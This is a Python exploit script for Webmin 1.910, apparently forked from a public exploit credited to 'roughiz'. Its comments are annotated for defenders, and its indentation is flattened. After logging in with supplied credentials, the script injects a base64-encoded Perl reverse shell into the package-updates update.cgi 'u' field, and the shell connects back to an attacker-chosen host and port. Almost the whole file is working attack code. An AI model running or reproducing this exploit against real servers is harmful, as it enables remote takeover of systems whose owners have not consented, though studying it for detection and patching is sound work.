#!/usr/bin/env python3
# -*- coding: utf8 -*-
"""Webmin 1.910 package-updates exploit script (forked from roughiz).

Flow, as implemented below:

1. Parse target and listener options from the command line.
2. POST the supplied credentials to ``session_login.cgi`` and read the
   ``sid`` session cookie out of the ``Set-Cookie`` response header.
3. POST to ``package-updates/update.cgi`` with that ``sid``, passing a
   ``u`` form field that carries a shell pipeline next to the package
   name.

Observable artefacts for defenders are the two POST requests above (the
second one with a ``u`` field containing shell metacharacters and a
``Referer`` of ``package-updates/?xnavigation=1``) and, on success, an
outbound TCP connection from the Webmin host to ``--lhost:--lport``.
"""
import requests
import urllib3
urllib3.disable_warnings()  # suppress urllib3 warnings; the verify=False calls below would otherwise warn
import argparse
import sys
import base64
from termcolor import colored
# Command-line interface.  Note that --SSL is a string, not a boolean flag:
# only the values listed in the check further down switch the URL to https.
arg_parser = argparse.ArgumentParser(description='Webmin 1.910 - Remote Code Execution using, python script')
arg_parser.add_argument('--rhost', dest='rhost', help='Ip address of the webmin server', type=str, required=True)
arg_parser.add_argument("--rport", dest="rport", type=int, help="target webmin port, default 10000", default=10000)
arg_parser.add_argument('--lhost', dest='lhost', help='Local ip address to listen for the reverse shell', type=str, required=True)
arg_parser.add_argument("--lport", dest="lport", type=int, help="The Bind port for the reverse shell\n Default is 4444", default=4444)
arg_parser.add_argument('-u','--user', dest='user', help='The username to use for authentication\n By default is admin', default='admin', type=str)
arg_parser.add_argument('-p','--password', dest='password', help='The password to use for authentication', required=True, type=str)
arg_parser.add_argument('-t','--TARGETURI', dest='targeturi', help='Base path for Webmin application. By default set to "/"', default='/',type=str)
arg_parser.add_argument('-s','--SSL', dest='ssl', help='Negotiate SSL/TLS for outgoing connections. By default ssl is set to False', default='False',type=str)
args = arg_parser.parse_args()
# Debug proxy settings.  NOTE: this dict is never passed to either
# requests.post() call below, so it currently has no effect.
proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}
# Step 1: authenticate and retrieve the session cookie (sid).
print(colored('****************************** Webmin 1.910 Exploit By roughiz*******************************', "blue"))
print(colored('*********************************************************************************************', "blue"))
print(colored('*********************************************************************************************', "blue"))
print(colored('*********************************************************************************************', "blue"))
print(colored('****************************** Retrieve Cookies sid *****************************************', "blue"))
req={'page':'','user':args.user,'pass':args.password}
# Build the base URL.  No separator is inserted before the CGI names
# appended later, so --TARGETURI has to end with "/" (the default does).
if args.ssl.lower() in ('yes', 'true', 't', 'y', '1'):
url="https://"+args.rhost+":"+str(args.rport)+args.targeturi
else:
url="http://"+args.rhost+":"+str(args.rport)+args.targeturi
# verify=False disables certificate validation on the https path; the
# credentials go over plain http unless --SSL is enabled.
resu=requests.post(url+"session_login.cgi",data=req, cookies={"testing":"1"}, verify=False, allow_redirects=False)
# Webmin answers with this text when it was reached over http but is serving https.
if b"This web server is running in SSL mode" in resu.content:
print(colored('********** [+] [Exploit][ERROR] Enable the ssl arg !!', "red"))
print((resu.content))
sys.exit(1)
# NOTE: indexing with [] raises KeyError when the response carries no
# Set-Cookie header at all; only a present header without "sid" reaches
# the else branch below.
if "sid" in resu.headers['Set-Cookie']:
# Take the text after the first "=" up to the first ";" as the sid value.
sid= resu.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip()
print("\n")
print(colored('********** [+] [Exploit] The Cookie is '+sid, "green"))
else:
print(colored('********** [+] [Exploit][ERROR] The authentication to the webmin server failed', "red"))
sys.exit(1)
print("")
print(colored('********************************************************************************************', "blue"))
print(colored('****************************** Create payload and Exploit ***********************************', "blue"))
print("\n")
# Step 2: build the payload.  Perl reverse-shell template; the listener
# address is interpolated from --lhost/--lport.
template="perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\""+args.lhost+":"+str(args.lport)+"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
# Base64-encode the template and wrap it in a bash -c pipeline that decodes
# and runs it; the leading " | " chains it onto the CGI's own command.
b64payload = base64.b64encode(bytes(f'{template}', 'utf-8'))
b64payload = b64payload.decode('utf-8')
payload=' | bash -c "{echo,'+b64payload+'}|{base64,-d}|{bash,-i}"'
## Step 3: send the payload.  A list value makes requests emit the "u"
## field twice: first the package name, then the injected pipeline.
req={'u':['acl/apt',payload]}
headers= {'Connection': 'close','referer': url+"package-updates/?xnavigation=1"}
try:
resu=requests.post(url+"package-updates/update.cgi",data=req, cookies={"sid":sid}, verify=False, allow_redirects=False, headers=headers, timeout=10)
# Timeouts and dropped connections are deliberately ignored (best-effort):
# presumably the request does not return normally once the command runs.
except requests.Timeout:
pass
except requests.ConnectionError:
pass
print('\n')
print(colored('********** [+] [Exploit] Verify you nc listener on port '+str(args.lport)+' for the incomming reverse shell', "green"))